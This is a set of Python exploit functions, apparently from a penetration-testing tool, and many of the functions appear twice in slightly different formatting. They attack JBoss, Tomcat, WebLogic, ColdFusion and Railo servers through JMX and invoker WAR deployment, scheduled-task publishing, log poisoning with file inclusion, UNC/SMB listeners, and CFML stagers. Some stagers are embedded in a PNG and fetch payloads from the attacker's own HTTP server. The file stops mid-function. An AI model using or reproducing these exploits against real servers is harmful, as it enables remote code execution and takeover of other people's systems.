def invoke(url, payload, os, version, pl_file): """ All we need to do is traverse up to the admin-ext-thumbnails directory and invoke our stager """ utility.Msg("Invoking stager and deploying payload...") fetchurl = "http://{0}:{1}/{2}".format(utility.local_address(), state.external_port, pl_file) # calculate file hash hsh = md5("%s-5000-5000" % fetchurl).hexdigest().upper() url = url.format(hsh) # fire up server server_thread = Thread(target=_serve, args=(payload,)) server_thread.start() sleep(2) r = utility.requests_get(url) if waitServe(server_thread): utility.Msg("{0} deployed at /railo-context/{0}".format( parse_war_path(payload,True)), LOG.SUCCESS) else: utility.Msg("Failed to deploy (HTTP %d)" % r.status_code, LOG.ERROR) killServe()
def invoke(url, payload, os, version, pl_file): """ All we need to do is traverse up to the admin-ext-thumbnails directory and invoke our stager """ utility.Msg("Invoking stager and deploying payload...") fetchurl = "http://{0}:{1}/{2}".format(utility.local_address(), state.external_port, pl_file) # calculate file hash hsh = md5("%s-5000-5000" % fetchurl).hexdigest().upper() url = url.format(hsh) # fire up server server_thread = Thread(target=_serve, args=(payload, )) server_thread.start() sleep(2) r = utility.requests_get(url) if waitServe(server_thread): utility.Msg( "{0} deployed at /railo-context/{0}".format( parse_war_path(payload, True)), LOG.SUCCESS) else: utility.Msg("Failed to deploy (HTTP %d)" % r.status_code, LOG.ERROR) killServe()
def create_task(ip, fingerprint, cfm_file, root): """ Create the task """ url = "http://{0}:{1}/CFIDE/administrator/scheduler/scheduleedit.cfm".\ format(ip, fingerprint.port) (cookie, csrf) = fetch_csrf(ip, fingerprint, url) data = { "csrftoken" : csrf, "TaskName" : cfm_file, "Start_Date" : "Jan 27, 2014", # shouldnt matter since we force run "ScheduleType" : "Once", "StartTimeOnce" : "9:56 PM", # see above "Operation" : "HTTPRequest", "ScheduledURL" : "http://{0}:8000/{1}".format(utility.local_address(), cfm_file), "publish" : "1", "publish_file" : root + "\\" + cfm_file, # slash on OS? "adminsubmit" : "Submit" } if fingerprint.version in ["10.0"]: data['publish_overwrite'] = 'on' response = utility.requests_get(url, cookies=cookie) if response.status_code is 200: # create task response = utility.requests_post(url, data=data, cookies=cookie, headers={'Content-Type':'application/x-www-form-urlencoded'}) if response.status_code is 200: return True
def deploy(fingerengine, fingerprint): """ """ war_file = fingerengine.options.deploy war_name = war_file.rsplit("/", 1)[1] utility.Msg("Preparing to deploy {0}...".format(war_file)) url = "http://{0}:{1}/invoker/EJBInvokerServlet".format( fingerengine.options.ip, fingerprint.port) local_url = "http://{0}:8000/{1}".format(utility.local_address(), war_name) # start the local HTTP server server_thread = Thread(target=_serve, args=(war_file,)) server_thread.start() # run serialization code response = invkdeploy(versions[1], url, local_url) if response is not None: utility.Msg(response, LOG.DEBUG) if waitServe(server_thread): utility.Msg("{0} deployed to {1}".format(war_file, fingerengine.options.ip), LOG.SUCCESS) else: utility.Msg("EJBInvokerServlet not vulnerable", LOG.ERROR) try: get("http://localhost:8000/", timeout=1.0) except: pass
def deploy(fingerengine, fingerprint): """ """ war_file = fingerengine.options.deploy war_name = war_file.rsplit("/", 1)[1] utility.Msg("Preparing to deploy {0}...".format(war_file)) url = "http://{0}:{1}/invoker/JMXInvokerServlet".format( fingerengine.options.ip, fingerprint.port) local_url = "http://{0}:8000/{1}".format(utility.local_address(), war_name) # start the local HTTP server server_thread = Thread(target=_serve, args=(war_file, )) server_thread.start() # run serialization code response = invkdeploy(versions[1], url, local_url) if response is not None: utility.Msg(response, LOG.DEBUG) if waitServe(server_thread): utility.Msg( "{0} deployed to {1}".format(war_file, fingerengine.options.ip), LOG.SUCCESS) else: utility.Msg("JMXInvokerServlet not vulnerable", LOG.ERROR) try: get("http://localhost:8000/", timeout=1.0) except: pass
def run(self, fingerengine, fingerprint): """ Same concept as the JBoss module, except we actually invoke the deploy function. """ if getuid() > 0: utility.Msg("Root privs required for this module.", LOG.ERROR) return utility.Msg("Setting up SMB listener...") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() utility.Msg("Invoking UNC deployer...") base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) if fingerprint.version in ["5.5"]: uri = '/manager/html/deploy?deployPath=/asdf&deployConfig=&'\ 'deployWar=file://{0}/asdf.war'.format(utility.local_address()) elif fingerprint.version in ["6.0", "7.0", "8.0"]: return self.runLatter(fingerengine, fingerprint, thread) else: utility.Msg("Unsupported Tomcat (v%s)" % fingerprint.version, LOG.ERROR) return url = base + uri response = utility.requests_get(url) if response.status_code == 401: utility.Msg( "Host %s:%s requires auth, checking..." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: response = utility.requests_get(url, cookies=cookies[0], auth=cookies[1]) else: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return while thread.is_alive(): # spin... sleep(1) if response.status_code != 200: utility.Msg("Unexpected response: HTTP %d" % response.status_code) self._Listen = False
def runLatter(self, fingerengine, fingerprint, smb_thread): """ """ base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port) uri = "/manager/html/deploy" data = OrderedDict([ ("deployPath", "/asdf"), ("deployConfig", ""), ("deployWar", "file://{0}/asdf.war".format(utility.local_address())), ]) cookies = None nonce = None # probe for auth response = utility.requests_get(base + '/manager/html') if response.status_code == 401: utility.Msg( "Host %s:%s requires auth, checking.." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: response = utility.requests_get(base + '/manager/html', cookies=cookies[0], auth=cookies[1]) # get nonce nonce = findall("CSRF_NONCE=(.*?)\"", response.content) if len(nonce) > 0: nonce = nonce[0] # set new jsessionid cookies = (dict_from_cookiejar(response.cookies), cookies[1]) else: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) return if response.status_code == 200: try: # all setup, now invoke response = utility.requests_post(base + uri + \ '?org.apache.catalina.filters.CSRF_NONCE=%s' % nonce, data = data, cookies=cookies[0], auth=cookies[1]) except: # timeout pass while smb_thread.is_alive(): # spin... sleep(1)
def run(self, fingerengine, fingerprint): """ Same as JBoss/Tomcat """ if not utility.check_admin(): utility.Msg("Root privs required for this module.", LOG.ERROR) return base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) uri = '/console/console.portal?AppApplicationInstallPortlet_actionOverride'\ '=/com/bea/console/actions/app/install/appSelected' data = { "AppApplicationInstallPortletselectedAppPath": "\\\\{0}\\fdas.war".format(utility.local_address()), "AppApplicationInstallPortletfrsc": None } if fingerprint.title is WINTERFACES.WLS: base = base.replace("http", "https") utility.Msg( "Host %s:%s requires auth, checking.." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint) if cookies[0]: utility.Msg("Setting up SMB listener...") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() # fetch our CSRF data['AppApplicationInstallPortletfrsc'] = self.fetchCSRF( base, cookies[0]) utility.Msg("Invoking UNC loader...") try: _ = utility.requests_post(base + uri, data=data, cookies=cookies[0], timeout=1.0) except: # we dont care about the response here pass else: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return while thread.is_alive(): # spin sleep(1) self._Listen = False
def create_task(ip, fingerprint, cfm_file, root): """ """ global cookie base = "http://{0}:{1}/railo-context/admin/web.cfm".format( ip, fingerprint.port) params = "?action=services.schedule&action2=create" data = OrderedDict([ ("name", cfm_file), ("url", "http://{0}:{1}/{2}".format(utility.local_address(), state.external_port, cfm_file)), ("interval", "once"), ("start_day", "01"), ("start_month", "01"), ("start_year", "2020"), ("start_hour", "00"), ("start_minute", "00"), ("start_second", "00"), ("run", "create") ]) response = utility.requests_post(base + params, data=data, cookies=cookie) if not response.status_code is 200 and cfm_file not in response.content: return False # pull the CSRF for our newly minted task csrf = findall("task=(.*?)\"", response.content) if len(data) > 0: csrf = csrf[0] else: utility.Msg( "Could not pull CSRF token of new task (failed to create?)", LOG.DEBUG) return False # proceed to edit the task; railo loses its mind if every var isnt here params = "?action=services.schedule&action2=edit&task=" + csrf data["port"] = state.external_port data["timeout"] = 50 data["run"] = "update" data["publish"] = "yes" data["file"] = root + '\\' + cfm_file data["_interval"] = "once" data["username"] = "" data["password"] = "" data["proxyport"] = "" data["proxyserver"] = "" data["proxyuser"] = "" data["proxypassword"] = "" data["end_hour"] = "" data["end_minute"] = "" data["end_second"] = "" data["end_day"] = "" data["end_month"] = "" data["end_year"] = "" response = utility.requests_post(base + params, data=data, cookies=cookie) if response.status_code is 200 and cfm_file in response.content: return True return False
def runLatter(self, fingerengine, fingerprint, smb_thread): """ """ base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port) uri = "/manager/html/deploy" data = OrderedDict([ ("deployPath", "/asdf"), ("deployConfig", ""), ("deployWar", "file://{0}/asdf.war".format(utility.local_address())), ]) cookies = None nonce = None # probe for auth response = utility.requests_get(base + '/manager/html') if response.status_code == 401: utility.Msg("Host %s:%s requires auth, checking.." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: response = utility.requests_get(base + '/manager/html', cookies=cookies[0], auth=cookies[1]) # get nonce nonce = findall("CSRF_NONCE=(.*?)\"", response.content) if len(nonce) > 0: nonce = nonce[0] # set new jsessionid cookies = (dict_from_cookiejar(response.cookies), cookies[1]) else: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) return if response.status_code == 200: try: # all setup, now invoke response = utility.requests_post(base + uri + \ '?org.apache.catalina.filters.CSRF_NONCE=%s' % nonce, data = data, cookies=cookies[0], auth=cookies[1]) except: # timeout pass while smb_thread.is_alive(): # spin... sleep(1)
def run(self, fingerengine, fingerprint): """ Same concept as the JBoss module, except we actually invoke the deploy function. """ if getuid() > 0: utility.Msg("Root privs required for this module.", LOG.ERROR) return utility.Msg("Setting up SMB listener...") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() utility.Msg("Invoking UNC deployer...") base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) if fingerprint.version in ["5.5"]: uri = '/manager/html/deploy?deployPath=/asdf&deployConfig=&'\ 'deployWar=file://{0}/asdf.war'.format(utility.local_address()) elif fingerprint.version in ["6.0", "7.0", "8.0"]: return self.runLatter(fingerengine, fingerprint, thread) else: utility.Msg("Unsupported Tomcat (v%s)" % fingerprint.version, LOG.ERROR) return url = base + uri response = utility.requests_get(url) if response.status_code == 401: utility.Msg("Host %s:%s requires auth, checking..." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: response = utility.requests_get(url, cookies=cookies[0], auth=cookies[1]) else: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return while thread.is_alive(): # spin... sleep(1) if response.status_code != 200: utility.Msg("Unexpected response: HTTP %d" % response.status_code) self._Listen = False
def getData(self, version): """ For some reason 5.x+ double encodes characters Haven't figured this out yet for 7.x """ if version in ["5.0", "5.1", "6.0", "6.1"]: return OrderedDict([ ('action', 'invokeOp'), ('name', 'jboss%3Atype%3DService%2Cname%3DSystemProperties'), ('methodIndex', 21), ('arg0', "\\\\{0}\\asdf".format(utility.local_address())) ]) elif version in ["3.2", "4.0", "4.2"]: return OrderedDict([ ('action', 'invokeOp'), ('name', 'jboss:type=Service,name=SystemProperties'), ('methodIndex', 21), ('arg0', "\\\\{0}\\asdf".format(utility.local_address())) ])
def create_task(ip, fingerprint, cfm_file, root): """ Create the task """ url = "http://{0}:{1}/CFIDE/administrator/scheduler/scheduleedit.cfm".\ format(ip, fingerprint.port) (cookie, csrf) = fetch_csrf(ip, fingerprint, url) data = { "TaskName": cfm_file, "Start_Date": "Jan 27, 2014", # shouldnt matter since we force run "ScheduleType": "Once", "StartTimeOnce": "9:56 PM", # see above "Operation": "HTTPRequest", "ScheduledURL": "http://{0}:{1}/{2}".format(state.external_port, utility.local_address(), cfm_file), "publish": "1", "publish_file": root + "\\" + cfm_file, # slash on OS? "adminsubmit": "Submit" } # version-specific settings if fingerprint.version in ["9.0", "10.0", '11.0']: data['csrftoken'] = csrf if fingerprint.version in ["10.0", '11.0']: data['publish_overwrite'] = 'on' if fingerprint.version in ["7.0", "8.0"]: data['taskNameOrig'] = "" response = utility.requests_get(url, cookies=cookie) if response.status_code is 200: # create task response = utility.requests_post( url, data=data, cookies=cookie, headers={'Content-Type': 'application/x-www-form-urlencoded'}) if response.status_code is 200: return True else: utility.Msg("Failed to deploy (HTTP %d)" % response.status_code, LOG.ERROR)
def load_file(url, payload_file, os, version): """ Make a copy of our test PNG file, embed the stager into it, change the extension, and stash it on the server """ pl_file = "msh%d.cfm" % randint(0, 500) fetchurl = "http://{0}:{1}/{2}".format(utility.local_address(), state.external_port, payload_file) b64 = b64encode(fetchurl) stager = "<cfhttp method='get' url='#ToString(ToBinary('{0}'))#'"\ " path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\..\context\'"\ " file='{1}'>".format(b64, payload_file) # set our stager system("cp ./src/lib/railo/header.png {0}/{1}".format( state.serve_dir, pl_file)) with open("{0}/{1}".format(state.serve_dir, pl_file), "ab") as f: f.write(stager + '\x00') # fire up server server_thread = Thread(target=_serve, args=("%s/%s" % (state.serve_dir, pl_file), )) server_thread.start() sleep(2) # invoke _ = utility.requests_get( url.format('http://{0}:{1}/{2}'.format(utility.local_address(), state.external_port, pl_file))) if waitServe(server_thread): utility.Msg( "%s stashed on remote host, preparing to invoke..." % pl_file, LOG.DEBUG) else: utility.Msg("Failed to invoke server call", LOG.ERROR) pl_file = None killServe() return pl_file
def run(self, fingerengine, fingerprint): """ Same as JBoss/Tomcat """ if getuid() > 0: utility.Msg("Root privs required for this module.", LOG.ERROR) return base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) uri = '/console/console.portal?AppApplicationInstallPortlet_actionOverride'\ '=/com/bea/console/actions/app/install/appSelected' data = { "AppApplicationInstallPortletselectedAppPath" : "\\\\{0}\\fdas.war".format(utility.local_address()), "AppApplicationInstallPortletfrsc" : None } if fingerprint.title is WINTERFACES.WLS: base = base.replace("http", "https") utility.Msg("Host %s:%s requires auth, checking.." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint) if cookies[0]: utility.Msg("Setting up SMB listener...") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() # fetch our CSRF data['AppApplicationInstallPortletfrsc'] = self.fetchCSRF(base, cookies[0]) utility.Msg("Invoking UNC loader...") try: _ = utility.requests_post(base+uri, data=data, cookies=cookies[0], timeout=1.0) except: # we dont care about the response here pass else: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return while thread.is_alive(): # spin sleep(1) self._Listen = False
def load_file(url, payload_file, os, version): """ Make a copy of our test PNG file, embed the stager into it, change the extension, and stash it on the server """ pl_file = "msh%d.cfm" % randint(0, 500) fetchurl = "http://{0}:{1}/{2}".format(utility.local_address(), state.external_port, payload_file) b64 = b64encode(fetchurl) stager = "<cfhttp method='get' url='#ToString(ToBinary('{0}'))#'"\ " path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\..\context\'"\ " file='{1}'>".format(b64, payload_file) # set our stager copyfile("./src/lib/railo/header.png", "{0}/{1}".format(state.serve_dir, pl_file)) with open("{0}/{1}".format(state.serve_dir, pl_file), "ab") as f: f.write(stager + '\x00') # fire up server server_thread = Thread(target=_serve, args=("%s/%s" % (state.serve_dir, pl_file),)) server_thread.start() sleep(2) # invoke _ = utility.requests_get(url.format('http://{0}:{1}/{2}'.format( utility.local_address(), state.external_port, pl_file))) if waitServe(server_thread): utility.Msg("%s stashed on remote host, preparing to invoke..." % pl_file, LOG.DEBUG) else: utility.Msg("Failed to invoke server call", LOG.ERROR) pl_file = None killServe() return pl_file
def run(self, fingerengine, fingerprint): """ Create a search collection via a nonexistent datasource """ if getuid() > 0: utility.Msg("Root privs required for this module.", LOG.ERROR) return utility.Msg("Setting up SMB listener...") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() utility.Msg("Invoking UNC deployer...") base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) uri = "/railo-context/admin/web.cfm?action=services.search" data = { "collName": "asdf", "collPath": "\\\\{0}\\asdf".format(utility.local_address()), "collLanguage": "english", "run": "create" } url = base + uri cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title) if not cookies: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) self._Listen = False return response = utility.requests_post(url, data=data, cookies=cookies) while thread.is_alive(): # spin... sleep(1) if response.status_code != 200: utility.Msg("Unexpected response: HTTP %d" % response.status_code) self._Listen = False
def deploy(fingerengine, fingerprint): """ """ war_file = abspath(fingerengine.options.deploy) war_name = parse_war_path(war_file, True) # start the local HTTP server server_thread = Thread(target=_serve, args=(war_file, )) server_thread.start() sleep(1.5) utility.Msg("Preparing to deploy {0}...".format(war_file)) url = "http://{0}:{1}/web-console/Invoker".format(fingerengine.options.ip, fingerprint.port) local_url = "http://{0}:{1}/{2}".format(utility.local_address(), state.external_port, war_name) # poll the URL to check for a 401 response = utility.requests_get(url) if response.status_code == 401: utility.Msg("Host %s:%s requires auth for web-console, checking..", LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: (usr, pswd) = (cookies[1].username, cookies[1].password) response = wc_invoke(url, local_url, usr, pswd) else: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) else: # run our java lib for serializing the request response = wc_invoke(url, local_url) if not response == '': utility.Msg(response, LOG.DEBUG) if waitServe(server_thread): utility.Msg( "{0} deployed to {1}".format(war_file, fingerengine.options.ip), LOG.SUCCESS) killServe()
def deploy(fingerengine, fingerprint): """ """ war_file = abspath(fingerengine.options.deploy) war_name = war_file.rsplit('/', 1)[1] # start the local HTTP server server_thread = Thread(target=_serve, args=(war_file,)) server_thread.start() sleep(1.5) utility.Msg("Preparing to deploy {0}...".format(war_file)) url = "http://{0}:{1}/web-console/Invoker".format( fingerengine.options.ip, fingerprint.port) local_url = "http://{0}:{1}/{2}".format(utility.local_address(), state.external_port,war_name) # poll the URL to check for a 401 response = utility.requests_get(url) if response.status_code == 401: utility.Msg("Host %s:%s requires auth for web-console, checking..", LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: (usr, pswd) = (cookies[1].username, cookies[1].password) response = wc_invoke(url, local_url, usr, pswd) else: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) else: # run our java lib for serializing the request response = wc_invoke(url, local_url) if not response == '': utility.Msg(response, LOG.DEBUG) if waitServe(server_thread): utility.Msg("{0} deployed to {1}".format(war_file, fingerengine.options.ip), LOG.SUCCESS) killServe()
def run(self, fingerengine, fingerprint): """ Create a search collection via a nonexistent datasource """ if getuid() > 0: utility.Msg("Root privs required for this module.", LOG.ERROR) return utility.Msg("Setting up SMB listener...") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() utility.Msg("Invoking UNC deployer...") base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) uri = "/railo-context/admin/web.cfm?action=services.search" data = { "collName" : "asdf", "collPath" : "\\\\{0}\\asdf".format(utility.local_address()), "collLanguage" : "english", "run" : "create" } url = base + uri cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title) if not cookies: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) self._Listen = False return response = utility.requests_post(url, data=data, cookies=cookies) while thread.is_alive(): # spin... sleep(1) if response.status_code != 200: utility.Msg("Unexpected response: HTTP %d" % response.status_code) self._Listen = False
def deploy(fingerengine, fingerprint): """ Exploits log poisoning to inject CFML stager code that pulls down our payload and stashes it in web root """ cfm_path = abspath(fingerengine.options.deploy) cfm_file = parse_war_path(cfm_path, True) dip = fingerengine.options.ip base = 'http://{0}:{1}/'.format(dip, fingerprint.port) stager = "<cfhttp method='get' url='#ToString(ToBinary('{0}'))#'"\ " path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#'"\ " file='{1}'>" # ensure we're deploying a valid filetype extension = cfm_file.rsplit('.', 1)[1] if extension.lower() not in ['jsp', 'cfml']: utility.Msg("This deployer requires a JSP/CFML payload", LOG.ERROR) return # start up our local server to catch the request server_thread = Thread(target=_serve, args=(cfm_path, )) server_thread.start() # inject stager utility.Msg("Injecting stager...") b64addr = b64encode('http://{0}:{1}/{2}'.format(utility.local_address(), state.external_port, cfm_file)) stager = quote_plus(stager.format(b64addr, cfm_file)) stager += ".cfml" # trigger the error for log injection _ = utility.requests_get(base + stager) # stager injected, now load the log file via LFI if fingerprint.version in ["9.0", "10.0"]: LinvokeLFI(base, fingerengine, fingerprint) else: invokeLFI(base, fingerengine, fingerprint) if waitServe(server_thread): utility.Msg("{0} deployed at /{0}".format(cfm_file), LOG.SUCCESS) else: utility.Msg("Failed to deploy file.", LOG.ERROR) killServe()
def deploy(fingerengine, fingerprint): """ Exploits log poisoning to inject CFML stager code that pulls down our payload and stashes it in web root """ cfm_path = abspath(fingerengine.options.deploy) cfm_file = parse_war_path(cfm_path, True) dip = fingerengine.options.ip base = 'http://{0}:{1}/'.format(dip, fingerprint.port) stager = "<cfhttp method='get' url='#ToString(ToBinary('{0}'))#'"\ " path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#'"\ " file='{1}'>" # ensure we're deploying a valid filetype extension = cfm_file.rsplit('.', 1)[1] if extension.lower() not in ['jsp', 'cfml']: utility.Msg("This deployer requires a JSP/CFML payload", LOG.ERROR) return # start up our local server to catch the request server_thread = Thread(target=_serve, args=(cfm_path,)) server_thread.start() # inject stager utility.Msg("Injecting stager...") b64addr = b64encode('http://{0}:{1}/{2}'.format(utility.local_address(), state.external_port,cfm_file)) stager = quote_plus(stager.format(b64addr, cfm_file)) stager += ".cfml" # trigger the error for log injection _ = utility.requests_get(base + stager) # stager injected, now load the log file via LFI if fingerprint.version in ["9.0", "10.0"]: LinvokeLFI(base, fingerengine, fingerprint) else: invokeLFI(base, fingerengine, fingerprint) if waitServe(server_thread): utility.Msg("{0} deployed at /{0}".format(cfm_file), LOG.SUCCESS) else: utility.Msg("Failed to deploy file.", LOG.ERROR) killServe()
def create_task(ip, fingerprint, cfm_file, root): """ Create the task """ url = "http://{0}:{1}/CFIDE/administrator/scheduler/scheduleedit.cfm".\ format(ip, fingerprint.port) (cookie, csrf) = fetch_csrf(ip, fingerprint, url) data = { "TaskName" : cfm_file, "Start_Date" : "Jan 27, 2014", # shouldnt matter since we force run "ScheduleType" : "Once", "StartTimeOnce" : "9:56 PM", # see above "Operation" : "HTTPRequest", "ScheduledURL" : "http://{0}:{1}/{2}".format( utility.local_address(), state.external_port, cfm_file), "publish" : "1", "publish_file" : root + "\\" + cfm_file, # slash on OS? "adminsubmit" : "Submit" } # version-specific settings if fingerprint.version in ["9.0", "10.0", '11.0']: data['csrftoken'] = csrf if fingerprint.version in ["10.0", '11.0']: data['publish_overwrite'] = 'on' if fingerprint.version in ["7.0", "8.0"]: data['taskNameOrig'] = "" response = utility.requests_get(url, cookies=cookie) if response.status_code is 200: # create task response = utility.requests_post(url, data=data, cookies=cookie, headers={'Content-Type':'application/x-www-form-urlencoded'}) if response.status_code is 200: return True else: utility.Msg("Failed to deploy (HTTP %d)" % response.status_code, LOG.ERROR);
def deploy(fingerengine, fingerprint): """ """ war_file = abspath(fingerengine.options.deploy) war_name = war_file.rsplit('/', 1)[1] # start up the local HTTP server server_thread = Thread(target=_serve, args=(war_file,)) server_thread.start() sleep(2) # major versions of JBoss have different method indices methodIndex = {"3.0" : 21, "3.2" : 22, "4.0" : 3, "4.2" : 3, "6.0" : 19, "6.1" : 19 } if fingerprint.version == "3.0": tmp = utility.capture_input("Version 3.0 has a strict WAR XML structure. " "Ensure your WAR is compatible with 3.0 [Y/n]") if 'n' in tmp.lower(): return utility.Msg("Preparing to deploy {0}..".format(war_file)) url = 'http://{0}:{1}/jmx-console/HtmlAdaptor'.format( fingerengine.options.ip, fingerprint.port) data = OrderedDict([ ('action', 'invokeOp'), ('name', 'jboss.system:service=MainDeployer'), ('methodIndex', methodIndex[fingerprint.version]), ('arg0', 'http://{0}:8000/{1}'.format( utility.local_address(), war_name)) ]) response = utility.requests_post(url, data=data) if response.status_code == 401: utility.Msg("Host %s:%s requires auth for JMX, checking..." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: try: response = utility.requests_post(url, data=data, cookies=cookies[0], auth=cookies[1]) except exceptions.Timeout: # we should be fine here, so long as we get the POST request off. # Just means that we haven't gotten a response quite yet. response.status_code = 200 else: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return if response.status_code == 200: if waitServe(server_thread): utility.Msg("{0} deployed to {1}".format(war_file, fingerengine.options.ip), LOG.SUCCESS) else: utility.Msg("Failed to call {0} (HTTP {1})".format (fingerengine.options.ip, response.status_code), LOG.ERROR) # kill our local HTTP server try: get("http://localhost:8000/", timeout=1.0) except: pass
def create_task(ip, fingerprint, cfm_file, root, cookie): """ Generate a new task; all parameters are necessary, unfortunately """ base = "http://{0}:{1}".format(ip, fingerprint.port) uri = '/CFIDE/administrator/scheduler/scheduleedit.cfm' if fingerprint.version in ['5.0']: data = { "taskNameOrig" : "", "TaskName" : cfm_file, "StartDate" : "01/01/2020", "EndDate" : "", "ScheduleType" : "Once", "StartTimeOnce" : "13:24:05", "Interval" : "Daily", "StartTimeDWM" : "", "customInterval" : "0", "CustomStartTime" : "", "CustomEndTime" : "", "Operation" : "HTTPRequest", "Port" : state.external_port, "ScheduledURL" : "http://{0}/{1}".format(utility.local_address(), cfm_file), "Username" : "", "Password" : "", "RequestTimeout" : "10", "ProxyServer" : "", "HttpProxyPort" : "23", "Publish" : "1", "filePath" : root, "File" : cfm_file.replace('cfml', 'cfm'), "adminsubmit" : "Submit+Changes" } else: data = { "TaskName" : cfm_file, "Start_Date" : "Jan 2, 2020", "End_Date" : "", "ScheduleType" : "Once", "StartTimeOnce" : "13:24:50", "Interval" : "Daily", "StartTimeDWM" : "", "customInterval_hour" : "0", "customInterval_min" : "0", "customInterval_sec" : "0", "CustomStartTime" : "", "CustomEndTime" : "", "Operation" : "HTTPRequest", "ScheduledURL" : "http://{0}:{1}/{2}".format(utility.local_address(), state.external_port, cfm_file), "Username" : "", "Password" : "", "Request_Time_out" : "", "proxy_server" : "", "http_proxy_port" : "", "publish" : "1", "publish_file" : root + "\\" + cfm_file, "adminsubmit" : "Submit", "taskNameOrig" : "" } response = utility.requests_post(base+uri, data=data, cookies=cookie) if response.status_code is 200: return True
def create_task(ip, fingerprint, cfm_file, root): """ """ global cookie base = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, fingerprint.port) params = "?action=services.schedule&action2=create" data = OrderedDict([ ("name", cfm_file), ("url", "http://{0}:{1}/{2}".format( utility.local_address(), state.external_port, cfm_file)), ("interval", "once"), ("start_day", "01"), ("start_month", "01"), ("start_year", "2020"), ("start_hour", "00"), ("start_minute", "00"), ("start_second", "00"), ("run", "create") ]) response = utility.requests_post(base + params, data=data, cookies=cookie) if not response.status_code is 200 and cfm_file not in response.content: return False # pull the CSRF for our newly minted task csrf = findall("task=(.*?)\"", response.content) if len(data) > 0: csrf = csrf[0] else: utility.Msg("Could not pull CSRF token of new task (failed to create?)", LOG.DEBUG) return False # proceed to edit the task; railo loses its mind if every var isnt here params = "?action=services.schedule&action2=edit&task=" + csrf data["port"] = state.external_port data["timeout"] = 50 data["run"] = "update" data["publish"] = "yes" data["file"] = root + '\\' + cfm_file data["_interval"] = "once" data["username"] = "" data["password"] = "" data["proxyport"] = "" data["proxyserver"] = "" data["proxyuser"] = "" data["proxypassword"] = "" data["end_hour"] = "" data["end_minute"] = "" data["end_second"] = "" data["end_day"] = "" data["end_month"] = "" data["end_year"] = "" response = utility.requests_post(base + params, data=data, cookies=cookie) if response.status_code is 200 and cfm_file in response.content: return True return False
def deploy(fingerengine, fingerprint): """ Exploit a post-auth RCE vulnerability in Railo; uses a simple cfhttp stager to drop the payload """ payload = parse_war_path(fingerengine.options.deploy, True) payload_path = abspath(fingerengine.options.deploy) stager = ":<cfhttp method=\"get\" url=\"http://{0}:{1}/{2}\""\ " path=\"{3}\" file=\"{2}\">" base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) cookie = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title) if not cookie: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return utility.Msg("Fetching path...") path = fetchPath(fingerengine, fingerprint) utility.Msg("Found path %s" % path, LOG.DEBUG) # configure stager stager = quote(stager.format(utility.local_address(), state.external_port, payload, path + "\context" if fingerengine.options.remote_os \ is 'windows' else '/context')) utility.Msg("Pulling id file...") fid = fetchId(base, path, cookie) if not fid: return utility.Msg("Found id %s" % fid, LOG.DEBUG) # we've got both the security token and the security key, calculate filename session_file = md5(fid + md5(path).hexdigest()).hexdigest() utility.Msg("Session file is web-%s.cfm, attempting to inject stager..." % session_file) # trigger a new favorite 